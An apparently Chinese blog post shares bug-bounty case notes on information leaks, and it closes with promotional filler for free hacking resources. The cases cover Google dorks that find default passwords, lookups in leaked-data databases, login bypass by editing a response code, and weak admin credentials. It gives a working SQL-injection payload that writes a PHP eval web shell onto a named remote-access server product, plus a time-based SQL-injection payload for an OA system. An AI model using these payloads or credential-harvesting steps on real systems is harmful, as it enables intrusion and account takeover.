互联网侧漏--挖掘思路分享

扫码领取网安教程

简要

信息收集的重要性不言而喻，根据互联网侧信息泄露+社会工程学技术可以收集大量信息，通过该信息登录后台获取更多功能点扩大信息收集面继续扩大功能点，从而通过更多的功能点测试更多的漏洞。

案例1

google搜索初始密码

site:xxx.edu.cn  初始密码

获取到默认账号和密码规则

google搜索学号

site:xxx.edu.cn  学号

知道初始密码是身份证号，sg库去搜名字检索综合数据

默认账密登录

成功登录系统

案例2

同样操作，搜索学号

信息收集

忘记密码处

重置密码

成功重置登录

案例3

google搜索

获取到默认初始密码

登录系统

成功登录系统

这个信息泄露2000+账号

案例4

天翼系统NDay

直接搜索Nday，使用如下payload

/AgentBoard.XGI?user=-1'+union+select+1,'<?php+eval($_POST["cmd"]);?>'+into+outfile+"C:\\Program\+Files\+\(x86\)\\RealFriend\\Rap\+Server\\WebRoot\\4.php"+--+-&cmd=UserLogin

成功上传文件造成RCE

案例5

接口泄露敏感信息
这个可以看JS前端泄露，一般VUE框架都是前后端分离，接口很多，拿到所有接口写个字典爆破一下，说不定那个程序员粗心（高情商说法）有一个接口就没有鉴权。

案例6

前端逻辑缺陷
改返回包状态码直接绕过登录，这种对于前后端分离框架的网站也是很多的
网站输入用户名密码，登录抓包

获取上图返回包并更改resultCode为0.发包

成功进入后台

案例7

某OA的Nday
OA系统的漏洞都比较多，遇到网站使用的OA系统可去网上搜索历史漏洞，这里有一个SQL注入。
某OAsql延时注入
payload

company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(9-(IF(18015%3E3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX

sqlmap检测

案例8

某旅行公司的接口未授权
可直接访问注册按钮，注册用户
然后进行登录，成功登录

还发现管理员用户为弱口令admin:123456

案例9

网站挂黑链
这种对于ZF性质的网站是很严重的，主要是页面自带连接，可使用一些检测工具进行分析
如下图，某ZF网站登录口，鼠标悬停发现链接为sclbs.net网站

点击直接跳转至BC网站

总结

这几个案例算是漏洞挖掘比较常见的，也是相对来说SRC挖掘最快速有效的，但是最好使的还是如下：

社工+互联网侧信息收集拿大分，下课！

声明：⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤，任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的，否则后果⾃⾏承担。所有渗透都需获取授权！

今天只要你给我的文章点赞，我私藏的网安学习资料一样免费共享给你们，来看看有哪些东西。

网络安全学习资源分享:

给大家分享我自己学习的一份全套的网络安全学习资料，希望对想学习 网络安全的小伙伴们有帮助！

零基础入门

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

【点击免费领取】CSDN大礼包：《黑客&网络安全入门&进阶学习资源包》

1.学习路线图

攻击和防守要学的东西也不少，具体要学的东西我都写在了上面的路线图，如果你能学完它们，你去接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我自己录的网安视频教程，上面路线图的每一个知识点，我都有配套的视频讲解。【点击领取视频教程】

技术文档也是我自己整理的，包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点，电子书也有200多本【点击领取技术文档】

（都打包成一块的了，不能一一展开，总共300多集）

3.技术文档和电子书

技术文档也是我自己整理的，包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点，电子书也有200多本【点击领取书籍】

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等，感兴趣的同学不容错过。

最后就是我这几年整理的网安方面的面试题，如果你是要找网安方面的工作，它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的，如果大家有好的题目或者好的见解欢迎分享。

参考解析：深信服官网、奇安信官网、Freebuf、csdn等

内容特点：条理清晰，含图像化表示更加易懂。

内容概要：包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

👋全套《黑客&网络安全入门&进阶学习资源包》👇👇👇

这份完整版的学习资料已经上传CSDN，也可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】